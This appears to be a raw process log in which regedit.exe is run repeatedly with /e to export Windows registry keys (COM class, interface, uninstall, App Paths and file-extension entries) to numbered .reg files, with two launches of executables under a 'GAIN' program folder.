C:\Windows\SysWOW64\regedit.exe
/e "254.reg" "HKEY_CLASSES_ROOT\odc.cube\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "255.reg" "HKEY_CLASSES_ROOT\odc.table\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "256.reg" "HKEY_CLASSES_ROOT\odc.new\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "257.reg" "HKEY_CLASSES_ROOT\odc.database\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "258.reg" "HKEY_CLASSES_ROOT\MSComctlLib.ProgCtrl\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "259.reg" "HKEY_CLASSES_ROOT\LR.LexRefEnglishStemmer.1.0\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "260.reg" "HKEY_CLASSES_ROOT\LR.LexRefBilingualTextContext.1.0\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "261.reg" "HKEY_CLASSES_ROOT\LR.LexRefBilingualServiceAttribute.1.0\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "262.reg" "HKEY_CLASSES_ROOT\LR.LexRefServiceContainer.1.0\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "263.reg" "HKEY_CLASSES_ROOT\LR.LexRefStFrObject.1.0\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "264.reg" "HKEY_CLASSES_ROOT\LR.LexRefStEsObject.1.0\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "265.reg" "HKEY_CLASSES_ROOT\LR.LexRefServiceManager.1.0\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "266.reg" "HKEY_CLASSES_ROOT\ImeCommonAPIClassFactory1042\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "267.reg" "HKEY_CLASSES_ROOT\ImeCommonAPIClassFactory1028\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "268.reg" "HKEY_CLASSES_ROOT\ImeCommonAPI1042\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "269.reg" "HKEY_CLASSES_ROOT\ImeKeyEventHandler1042\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "270.reg" "HKEY_CLASSES_ROOT\LR.LexRefBilingualService.1.0\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "271.reg" "HKEY_CLASSES_ROOT\imkrhjd.hanjadic\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "272.reg" "HKEY_CLASSES_ROOT\IMEPad.SKF.TCIME\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "273.reg" "HKEY_CLASSES_ROOT\MOFL.Factoid\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "274.reg" "HKEY_CLASSES_ROOT\Microsoft.Workfolders\DefaultIcon"
C:\Windows\SysWOW64\regedit.exe
/e "275.reg" "HKEY_CLASSES_ROOT\Microsoft.TEC\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "276.reg" "HKEY_CLASSES_ROOT\ms-xbl-3d8b930f"
C:\Windows\SysWOW64\regedit.exe
/e "277.reg" "HKEY_CLASSES_ROOT\MSComctlLib.ListViewCtrl\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "278.reg" "HKEY_CLASSES_ROOT\MSComctlLib.ImageListCtrl\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "279.reg" "HKEY_CLASSES_ROOT\MSComctlLib.ImageComboCtl\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "280.reg" "HKEY_CLASSES_ROOT\mailto"
C:\Windows\SysWOW64\regedit.exe
/e "281.reg" "HKEY_CLASSES_ROOT\LR.LexRefXml2RTFObject.1.0\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "282.reg" "HKEY_CLASSES_ROOT\LR.LexRefTfFunctionProvider.1.0\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "283.reg" "HKEY_CLASSES_ROOT\microsoft-edge"
C:\Windows\SysWOW64\regedit.exe
/e "284.reg" "HKEY_CLASSES_ROOT\Microsoft.OsfMui.InstallerMainShell\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "285.reg" "HKEY_CLASSES_ROOT\Microsoft.MsoASB.RemoterTrusted\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "286.reg" "HKEY_CLASSES_ROOT\microsoft-edge-holographic"
C:\Windows\SysWOW64\regedit.exe
/e "287.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft EdgeWebView"
C:\Windows\SysWOW64\regedit.exe
/e "288.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge Update"
C:\Windows\SysWOW64\regedit.exe
/e "289.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"
C:\Windows\SysWOW64\regedit.exe
/e "290.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
C:\Windows\SysWOW64\regedit.exe
/e "291.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
C:\Windows\SysWOW64\regedit.exe
/e "292.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
C:\Windows\SysWOW64\regedit.exe
/e "293.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
C:\Windows\SysWOW64\regedit.exe
/e "294.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
C:\Windows\SysWOW64\regedit.exe
/e "295.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
C:\Windows\SysWOW64\regedit.exe
/e "296.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
C:\Windows\SysWOW64\regedit.exe
/e "297.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
C:\Windows\SysWOW64\regedit.exe
/e "298.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
C:\Windows\SysWOW64\regedit.exe
/e "299.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
C:\Windows\SysWOW64\regedit.exe
/e "300.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
C:\Windows\SysWOW64\regedit.exe
/e "301.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860"
C:\Windows\SysWOW64\regedit.exe
/e "302.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173"
C:\Windows\SysWOW64\regedit.exe
/e "303.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757"
C:\Windows\SysWOW64\regedit.exe
/e "304.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655"
C:\Windows\SysWOW64\regedit.exe
/e "305.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573"
C:\Windows\SysWOW64\regedit.exe
/e "306.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063"
C:\Windows\SysWOW64\regedit.exe
/e "307.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743"
C:\Windows\SysWOW64\regedit.exe
/e "308.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860"
C:\Windows\SysWOW64\regedit.exe
/e "309.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173"
C:\Windows\SysWOW64\regedit.exe
/e "310.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757"
C:\Windows\SysWOW64\regedit.exe
/e "311.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655"
C:\Windows\SysWOW64\regedit.exe
/e "312.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573"
C:\Windows\SysWOW64\regedit.exe
/e "313.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063"
C:\Windows\SysWOW64\regedit.exe
/e "314.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743"
C:\Windows\SysWOW64\regedit.exe
/e "315.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
C:\Windows\SysWOW64\regedit.exe
/e "316.reg" "HKEY_CLASSES_ROOT\OneNote.NoteLinkStoreService\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "317.reg" "HKEY_CLASSES_ROOT\OneNote.NoteLinkMeta\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "318.reg" "HKEY_CLASSES_ROOT\OneNote.NoteLinkContentService\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "319.reg" "HKEY_CLASSES_ROOT\OneNote.PowerPointAddinTakeNotesButton\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "320.reg" "HKEY_CLASSES_ROOT\OneNote.WordAddinTakeNotesService\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "321.reg" "HKEY_CLASSES_ROOT\OneNote.WordAddinTakeNotesButton\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "322.reg" "HKEY_CLASSES_ROOT\OneNote.PowerPointAddinTakeNotesService\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "323.reg" "HKEY_CLASSES_ROOT\OfficePriv.Application\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "324.reg" "HKEY_CLASSES_ROOT\OfficeCompatible.Application.x86\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "325.reg" "HKEY_CLASSES_ROOT\OfficeCompatible.Application.x64\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "326.reg" "HKEY_CLASSES_ROOT\omicaut.MathInputControl\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "327.reg" "HKEY_CLASSES_ROOT\OneNote.NoteAnchorCollection\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "328.reg" "HKEY_CLASSES_ROOT\OneNote.NoteAnchor\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "329.reg" "HKEY_CLASSES_ROOT\OneNote.CFileConverter\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "330.reg" "HKEY_CLASSES_ROOT\read"
C:\Windows\SysWOW64\regedit.exe
/e "331.reg" "HKEY_CLASSES_ROOT\PPSLAX.SlideLibrary\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "332.reg" "HKEY_CLASSES_ROOT\PowerPivotExcelClientAddIn.NativeEntry\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "333.reg" "HKEY_CLASSES_ROOT\Udtool.UserDicManager\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "334.reg" "HKEY_CLASSES_ROOT\WinProj.Activator\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "335.reg" "HKEY_CLASSES_ROOT\WECAPI5.FpwUser\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "336.reg" "HKEY_CLASSES_ROOT\WECAPI5.FpwGroup\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "337.reg" "HKEY_CLASSES_ROOT\osf.RemoterProxy\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "338.reg" "HKEY_CLASSES_ROOT\osf.OsfAxControl\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "339.reg" "HKEY_CLASSES_ROOT\OSE.Global\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "340.reg" "HKEY_CLASSES_ROOT\osf.Sandbox\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "341.reg" "HKEY_CLASSES_ROOT\OWS.PostData\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "342.reg" "HKEY_CLASSES_ROOT\otkloadr.WRLoader\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "343.reg" "HKEY_CLASSES_ROOT\osf.SandboxContext\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "344.reg" "HKEY_CLASSES_ROOT\IMContact.IMContactRecognizer\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "345.reg" "HKEY_CLASSES_ROOT\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "346.reg" "HKEY_CLASSES_ROOT\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "347.reg" "HKEY_CLASSES_ROOT\Interface\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "348.reg" "HKEY_CLASSES_ROOT\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "349.reg" "HKEY_CLASSES_ROOT\Interface\{F7F76FFB-E829-4360-9E57-F69C27FBA08A}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "350.reg" "HKEY_CLASSES_ROOT\Interface\{F57B7ED0-D8AB-11D1-85DF-00C04F98F42C}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "351.reg" "HKEY_CLASSES_ROOT\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "352.reg" "HKEY_CLASSES_ROOT\Interface\{EFA9C1B9-47B0-4BD8-AC63-DDF785C505B4}\ProxyStubClsid"
C:\PROGRA~2\GAIN\fsg.exe
"C:\PROGRA~2\GAIN\fsg.exe"
\??\c:\program files (x86)\gain\fsg_4201.exe
"c:\program files (x86)\gain\fsg_4201.exe"
C:\Windows\SysWOW64\regedit.exe
/e "353.reg" "HKEY_CLASSES_ROOT\Interface\{EF189461-5D62-4626-8E57-FF83583C4826}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "354.reg" "HKEY_CLASSES_ROOT\Interface\{EEE00921-E393-11D1-BB03-00C04FB6C4A6}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "355.reg" "HKEY_CLASSES_ROOT\Interface\{EFA9C1B9-47B0-4BD8-AC63-DDF785C505B4}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "356.reg" "HKEY_CLASSES_ROOT\Interface\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "357.reg" "HKEY_CLASSES_ROOT\Interface\{EFC9437E-3A57-487C-8471-9151D2FC1832}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "358.reg" "HKEY_CLASSES_ROOT\Interface\{EFC9437E-3A57-487C-8471-9151D2FC1832}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "359.reg" "HKEY_CLASSES_ROOT\Interface\{FCFB3D2B-A0FA-1068-A738-08002B3371B5}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "360.reg" "HKEY_CLASSES_ROOT\Interface\{FCFB3D2B-A0FA-1068-A738-08002B3371B5}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "361.reg" "HKEY_CLASSES_ROOT\Interface\{FC30CDDE-9AD1-455D-A1BE-4B0D90ECEC92}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "362.reg" "HKEY_CLASSES_ROOT\Interface\{FD37FE32-82BC-4A25-B056-315F4DBB194D}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "363.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\dfshim.dll"
C:\Windows\SysWOW64\regedit.exe
/e "364.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe"
C:\Windows\SysWOW64\regedit.exe
/e "365.reg" "HKEY_CLASSES_ROOT\Interface\{FEA77364-DF95-4A23-A905-019B79A8E481}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "366.reg" "HKEY_CLASSES_ROOT\Interface\{F9F2FE81-F764-4BD0-AFA5-5DE841DDB625}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "367.reg" "HKEY_CLASSES_ROOT\Interface\{F9F2FE81-F764-4BD0-AFA5-5DE841DDB625}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "368.reg" "HKEY_CLASSES_ROOT\Interface\{F7F76FFB-E829-4360-9E57-F69C27FBA08A}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "369.reg" "HKEY_CLASSES_ROOT\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "370.reg" "HKEY_CLASSES_ROOT\Interface\{FC30CDDE-9AD1-455D-A1BE-4B0D90ECEC92}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "371.reg" "HKEY_CLASSES_ROOT\Interface\{FB476970-9BAB-4861-811E-3E98B0C5ADDF}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "372.reg" "HKEY_CLASSES_ROOT\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "373.reg" "HKEY_CLASSES_ROOT\Interface\{EEE0091C-E393-11D1-BB03-00C04FB6C4A6}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "374.reg" "HKEY_CLASSES_ROOT\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "375.reg" "HKEY_CLASSES_ROOT\Interface\{E790E1D1-9DE8-4853-8AC6-933D4FD9C927}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "376.reg" "HKEY_CLASSES_ROOT\Interface\{E790E1D1-9DE8-4853-8AC6-933D4FD9C927}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "377.reg" "HKEY_CLASSES_ROOT\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "378.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C1-4442-11D1-8906-00A0C9110049}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "379.reg" "HKEY_CLASSES_ROOT\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "380.reg" "HKEY_CLASSES_ROOT\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "381.reg" "HKEY_CLASSES_ROOT\Interface\{DF48072F-5EF8-434E-9B40-E2F3AE759B5F}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "382.reg" "HKEY_CLASSES_ROOT\Interface\{DA936B64-AC8B-11D1-B6E5-00A0C90F2744}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "383.reg" "HKEY_CLASSES_ROOT\Interface\{DA936B62-AC8B-11D1-B6E5-00A0C90F2744}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "384.reg" "HKEY_CLASSES_ROOT\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "385.reg" "HKEY_CLASSES_ROOT\Interface\{E480B861-4708-4E6D-A5B4-A2B4EEB9BAA4}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "386.reg" "HKEY_CLASSES_ROOT\Interface\{E43FD401-8715-11D1-98E7-00A0C9702442}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "387.reg" "HKEY_CLASSES_ROOT\Interface\{E43FD401-8715-11D1-98E7-00A0C9702442}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "388.reg" "HKEY_CLASSES_ROOT\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "389.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C5-4442-11D1-8906-00A0C9110049}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "390.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C5-4442-11D1-8906-00A0C9110049}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "391.reg" "HKEY_CLASSES_ROOT\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "392.reg" "HKEY_CLASSES_ROOT\Interface\{EEE00919-E393-11D1-BB03-00C04FB6C4A6}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "393.reg" "HKEY_CLASSES_ROOT\Interface\{EEE00915-E393-11D1-BB03-00C04FB6C4A6}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "394.reg" "HKEY_CLASSES_ROOT\Interface\{EE5A151A-AD2A-4CEE-AD65-228B59F5B4AD}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "395.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C2-4442-11D1-8906-00A0C9110049}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "396.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C2-4442-11D1-8906-00A0C9110049}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "397.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C1-4442-11D1-8906-00A0C9110049}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "398.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C3-4442-11D1-8906-00A0C9110049}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "399.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C4-4442-11D1-8906-00A0C9110049}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "400.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C4-4442-11D1-8906-00A0C9110049}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "401.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C3-4442-11D1-8906-00A0C9110049}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "402.reg" "HKEY_CLASSES_ROOT\EntityPicker.EntityPicker\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "403.reg" "HKEY_CLASSES_ROOT\EntityDataProvider.EntityDataProvider\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "404.reg" "HKEY_CLASSES_ROOT\EntityDataHandler.EntityDataHandler\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "405.reg" "HKEY_CLASSES_ROOT\EntityPicker.PropPage1\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "406.reg" "HKEY_CLASSES_ROOT\ExcelPlugInShell.PowerMapConnect\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "407.reg" "HKEY_CLASSES_ROOT\ExcelPlugInShell.MapEdp\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "408.reg" "HKEY_CLASSES_ROOT\EntityPicker.PropPage2\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "409.reg" "HKEY_CLASSES_ROOT\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "410.reg" "HKEY_CLASSES_ROOT\.zoo"
C:\Windows\SysWOW64\regedit.exe
/e "411.reg" "HKEY_CLASSES_ROOT\.xps"
C:\Windows\SysWOW64\regedit.exe
/e "412.reg" "HKEY_CLASSES_ROOT\AdHocReportingExcelClientLib.AroAxControlShim\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "413.reg" "HKEY_CLASSES_ROOT\bingmaps"
C:\Windows\SysWOW64\regedit.exe
/e "414.reg" "HKEY_CLASSES_ROOT\BannerNotificationHandler.BannerNotificationHandler\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "415.reg" "HKEY_CLASSES_ROOT\AdHocReportingExcelClientLib.BusinessBarActiveX\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "416.reg" "HKEY_CLASSES_ROOT\HxDS.HxSession\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "417.reg" "HKEY_CLASSES_ROOT\HxDs.HxRegistryWalker\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "418.reg" "HKEY_CLASSES_ROOT\HxDS.HxRegisterSession\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "419.reg" "HKEY_CLASSES_ROOT\Ietag.EvtSink\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "420.reg" "HKEY_CLASSES_ROOT\IMContact.Factoid\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "421.reg" "HKEY_CLASSES_ROOT\Ietag.OOC\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "422.reg" "HKEY_CLASSES_ROOT\Ietag.Factory\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "423.reg" "HKEY_CLASSES_ROOT\FDate.Factoid\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "424.reg" "HKEY_CLASSES_ROOT\FBiblio.Factoid\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "425.reg" "HKEY_CLASSES_ROOT\ExcelPlugInShell.VisualizationLogger\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "426.reg" "HKEY_CLASSES_ROOT\FPerson.Factoid\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "427.reg" "HKEY_CLASSES_ROOT\HxDS.HxRegisterProtocol\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "428.reg" "HKEY_CLASSES_ROOT\FStock.Factoid\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "429.reg" "HKEY_CLASSES_ROOT\FPlace.Factoid\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "430.reg" "HKEY_CLASSES_ROOT\.wsb"
C:\Windows\SysWOW64\regedit.exe
/e "431.reg" "HKEY_CLASSES_ROOT\.bz2"
C:\Windows\SysWOW64\regedit.exe
/e "432.reg" "HKEY_CLASSES_ROOT\.arj"
C:\Windows\SysWOW64\regedit.exe
/e "433.reg" "HKEY_CLASSES_ROOT\.arc"
C:\Windows\SysWOW64\regedit.exe
/e "434.reg" "HKEY_CLASSES_ROOT\.bzip2"
C:\Windows\SysWOW64\regedit.exe
/e "435.reg" "HKEY_CLASSES_ROOT\.dctx"
C:\Windows\SysWOW64\regedit.exe
/e "436.reg" "HKEY_CLASSES_ROOT\.dat"
C:\Windows\SysWOW64\regedit.exe
/e "437.reg" "HKEY_CLASSES_ROOT\.chm"
C:\Windows\SysWOW64\regedit.exe
/e "438.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MsoHtmEd.exe"
C:\Windows\SysWOW64\regedit.exe
/e "439.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\install.exe"
C:\Windows\SysWOW64\regedit.exe
/e "440.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\fsquirt.exe"
C:\Windows\SysWOW64\regedit.exe
/e "441.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\setup.exe"
C:\Windows\SysWOW64\regedit.exe
/e "442.reg" "HKEY_CLASSES_ROOT\.7z"
C:\Windows\SysWOW64\regedit.exe
